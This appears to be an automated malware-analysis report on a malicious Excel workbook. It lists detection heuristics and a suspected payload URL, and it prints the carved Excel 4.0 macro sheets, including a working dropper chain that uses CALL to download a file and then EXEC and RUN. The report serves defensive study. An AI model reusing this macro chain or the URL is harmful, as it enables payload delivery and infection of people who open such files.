MALICIOUS
262
Risk Score
Heuristics 6
-
Excel 4.0 macro sheet (2 sheet(s)) critical 3 related findings OOXML_XLM_MACROSHEETSpreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
-
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAMEWorkbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
-
Dangerous XLM formula APIs: HALT, CALL, EXEC, RUN critical OOXML_XLM_DANGEROUS_FNExcel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
-
Binary XLM macro sheet with WinAPI/download strings critical OOXML_XLM_BINARY_WINAPI_STRINGSExcel 4.0 macro sheet is stored as BIFF12/XLSB binary data and contains Win32 download or process-execution API strings such as URLDownloadToFileA, ShellExecuteA, or CreateDirectoryA. These strings are high-signal in XLM macro sheets and catch payload-download macros that XML-formula scanners cannot parse.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://netstation.store/img/superts.php In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_sheet_00.xml |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet2.xml | 1400 bytes |
SHA-256: 97c0a38b067b7bcdf25006ad4152a4f3d342849f2138e7a8c461771c97adea9d |
|||
Preview scriptFirst 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="FJ330:FK335"/><sheetViews><sheetView showFormulas="1" zoomScaleNormal="100" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.44140625" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/><sheetData><row r="330" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ330" s="1"/><c r="FK330" s="1"/></row><row r="331" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ331" s="1"/><c r="FK331" s="1"/></row><row r="332" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ332" s="1"/><c r="FK332" s="1"/></row><row r="333" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ333" s="1" t="b"><f>HALT()</f><v>1</v></c><c r="FK333" s="1"/></row><row r="334" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ334" s="1"/><c r="FK334" s="1"/></row><row r="335" spans="166:167" x14ac:dyDescent="0.3"><c r="FJ335" s="1"/><c r="FK335" s="1"/></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet> |
|||
xlm_sheet_01.xml |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 6311 bytes |
SHA-256: 8c3ab64232e7a96fad94d6875391b2e5005c12f4027458afcd9112ec806360cd |
|||
Preview scriptFirst 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A11:AG52"/><sheetViews><sheetView showFormulas="1" zoomScaleNormal="100" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="4.44140625" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/><cols><col min="1" max="26" width="4.44140625" style="2"/><col min="27" max="27" width="4.44140625" style="2" customWidth="1"/><col min="28" max="16384" width="4.44140625" style="2"/></cols><sheetData><row r="11" spans="27:33" x14ac:dyDescent="0.3"><c r="AA11" s="1"/><c r="AB11" s="1"/><c r="AC11" s="1"/><c r="AD11" s="1"/><c r="AE11" s="1"/><c r="AF11" s="1"/><c r="AG11" s="1"/></row><row r="12" spans="27:33" x14ac:dyDescent="0.3"><c r="AA12" s="1"/><c r="AB12" s="1"/><c r="AC12" s="1"/><c r="AD12" s="1"/><c r="AE12" s="1"/><c r="AF12" s="1"/><c r="AG12" s="1"/></row><row r="13" spans="27:33" x14ac:dyDescent="0.3"><c r="AA13" s="1"/><c r="AB13" s="1"/><c r="AC13" s="1"/><c r="AD13" s="1"/><c r="AE13" s="1"/><c r="AF13" s="1"/><c r="AG13" s="1"/></row><row r="14" spans="27:33" x14ac:dyDescent="0.3"><c r="AA14" s="1"><f>CALL('Doc1'!AC16&'Doc1'!AC17,'Doc1'!AD16&'Doc1'!AD17,"JCJ",'Doc1'!AF16,0)</f><v>1</v></c><c r="AB14" s="1"/><c r="AC14" s="1"/><c r="AD14" s="1"/><c r="AE14" s="1"/><c r="AF14" s="1"/><c r="AG14" s="1"/></row><row r="15" spans="27:33" x14ac:dyDescent="0.3"><c r="AA15" s="1"><f>CALL('Doc1'!AC19&'Doc1'!AC20,'Doc1'!AD19&'Doc1'!AD20&'Doc1'!AD21&'Doc1'!AD22,'Doc1'!AE19&'Doc1'!AE20,0,A50,'Doc1'!AF16&'Doc1'!AF20,0,0)</f><v>0</v></c><c r="AB15" s="1"/><c r="AC15" s="1"/><c r="AD15" s="1"/><c r="AE15" s="1"/><c r="AF15" s="1"/><c r="AG15" s="1"/></row><row r="16" spans="27:33" x14ac:dyDescent="0.3"><c r="AA16" s="1" t="e"><f>CALL("INSENG","DownloadFile","BCCJ",A50,AF16&AF20,1)</f><v>#NUM!</v></c><c r="AB16" s="1"/><c r="AC16" s="1" t="s"><v>0</v></c><c r="AD16" s="1" t="s"><v>2</v></c><c r="AE16" s="1" t="s"><v>4</v></c><c r="AF16" s="1" t="s"><v>5</v></c><c r="AG16" s="1"/></row><row r="17" spans="27:33" x14ac:dyDescent="0.3"><c r="AA17" s="1"><f>EXEC('Doc1'!AC24&'Doc1'!AC25&"C:\orwkw\kkfm.reo"&'Doc1'!AD24&'Doc1'!AD25)</f><v>33</v></c><c r="AB17" s="1"/><c r="AC17" s="1" t="s"><v>1</v></c><c r="AD17" s="1" t="s"><v>3</v></c><c r="AE17" s="1"/><c r="AF17" s="1"/><c r="AG17" s="1"/></row><row r="18" spans="27:33" x14ac:dyDescent="0.3"><c r="AA18" s="1" t="b"><f>RUN('Doc2'!FJ333)</f><v>0</v></c><c r="AB18" s="1"/><c r="AC18" s="1"/><c r="AD18" s="1"/><c r="AE18" s="1"/><c r="AF18" s="1"/><c r="AG18" s="1"/></row><row r="19" spans="27:33" x14ac:dyDescent="0.3"><c r="AA19" s="1"/><c r="AB19" s="1"/><c r="AC19" s="1" t="s"><v>6</v></c><c r="AD19" s="1" t="s"><v>6</v></c><c r="AE19" s="1" t="s"><v>9</v></c><c r="AF19" s="1"/><c r="AG19" s="1"/></row><row r="20" spans="27:33" x14ac:dyDescent="0.3"><c r="AA20" s="1"/><c r="AB20" s="1"/><c r="AC20" s="1" t="s"><v>15</v></c><c r="AD20" s="1" t="s"><v>16</v></c><c r="AE20" s="1" t="s"><v>10</v></c><c r="AF20" s="1" t="s"><v>17</v></c><c r="AG20" s="1"/></row><row r="21" spans="27:33" x14ac:dyDescent="0.3"><c r="AA21" s="1"/><c r="AB21" s="1"/><c r="AC21" s="1"/><c r="AD21" s="1" t="s"><v>7</v></c><c r="AE21" s="1"/><c r="AF21" s="1"/><c r="AG21" s="1"/></row><row r="22" spans="27:33" x14ac:dyDescent="0.3"><c r="AA22" s="1"/><c r="AB22" s="1"/><c r="AC22" s="1"/><c r="AD22" s="1" t="s"><v>8</v></c><c r="AE22" s="1"/><c r="AF22" s="1"/><c r="AG22" s="1"/></row><row r="23" spans="27:33" x14ac:dyDescent="0.3"><c r="AA23" s="1"/><c r="AB23" s="1"/><c r="AC23" s="1"/><c r="AD23" s="1"/><c r="AE23" s="1"/><c r="AF23" s="1"/><c r="AG23" s="1"/></row><row r="24" spans="27:33" x14ac:dyDescent="0.3"><c r="AA24" s="1"/><c r="AB24" s="1"/><c r="AC24" s="1" t="s"><v>11</v></c><c r="AD24" s="1" t="s"><v>13</v></c><c r="AE24" s="1"/><c r="AF24" s="1"/><c r="AG24" s="1"/></row><row r="25" spans="27:33" x14ac:dyDescent="0.3"><c r="AA25" s="1"/><c r="AB25" s="1"/><c r="AC25" s="1" t="s"><v>12</v></c><c r="AD25" s="1" t="s"><v>14</v></c><c r="AE25" s="1"/><c r="AF25" s="1"/><c r="AG25" s="1"/></row><row r="26" spans="27:33" x14ac:dyDescent="0.3"><c r="AA26" s="1"/><c r="AB26" s="1"/><c r="AC26" s="1"/><c r="AD26" s="1"/><c r="AE26" s="1"/><c r="AF26" s="1"/><c r="AG26" s="1"/></row><row r="27" spans="27:33" x14ac:dyDescent="0.3"><c r="AA27" s="1"/><c r="AB27" s="1"/><c r="AC27" s="1"/><c r="AD27" s="1"/><c r="AE27" s="1"/><c r="AF27" s="1"/><c r="AG27" s="1"/></row><row r="28" spans="27:33" x14ac:dyDescent="0.3"><c r="AA28" s="1"/><c r="AB28" s="1"/><c r="AC28" s="1"/><c r="AD28" s="1"/><c r="AE28" s="1"/><c r="AF28" s="1"/><c r="AG28" s="1"/></row><row r="29" spans="27:33" x14ac:dyDescent="0.3"><c r="AA29" s="1"/><c r="AB29" s="1"/><c r="AC29" s="1"/><c r="AD29" s="1"/><c r="AE29" s="1"/><c r="AF29" s="1"/><c r="AG29" s="1"/></row><row r="30" spans="27:33" x14ac:dyDescent="0.3"><c r="AA30" s="1"/><c r="AB30" s="1"/><c r="AC30" s="1"/><c r="AD30" s="1"/><c r="AE30" s="1"/><c r="AF30" s="1"/><c r="AG30" s="1"/></row><row r="31" spans="27:33" x14ac:dyDescent="0.3"><c r="AA31" s="1"/><c r="AB31" s="1"/><c r="AC31" s="1"/><c r="AD31" s="1"/><c r="AE31" s="1"/><c r="AF31" s="1"/><c r="AG31" s="1"/></row><row r="46" spans="1:1" x14ac:dyDescent="0.3"><c r="A46" s="1"/></row><row r="47" spans="1:1" x14ac:dyDescent="0.3"><c r="A47" s="1"/></row><row r="48" spans="1:1" x14ac:dyDescent="0.3"><c r="A48" s="1"/></row><row r="49" spans="1:1" x14ac:dyDescent="0.3"><c r="A49" s="1"/></row><row r="50" spans="1:1" x14ac:dyDescent="0.3"><c r="A50" s="1" t="s"><v>29</v></c></row><row r="51" spans="1:1" x14ac:dyDescent="0.3"><c r="A51" s="1"/></row><row r="52" spans="1:1" x14ac:dyDescent="0.3"><c r="A52" s="1"/></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.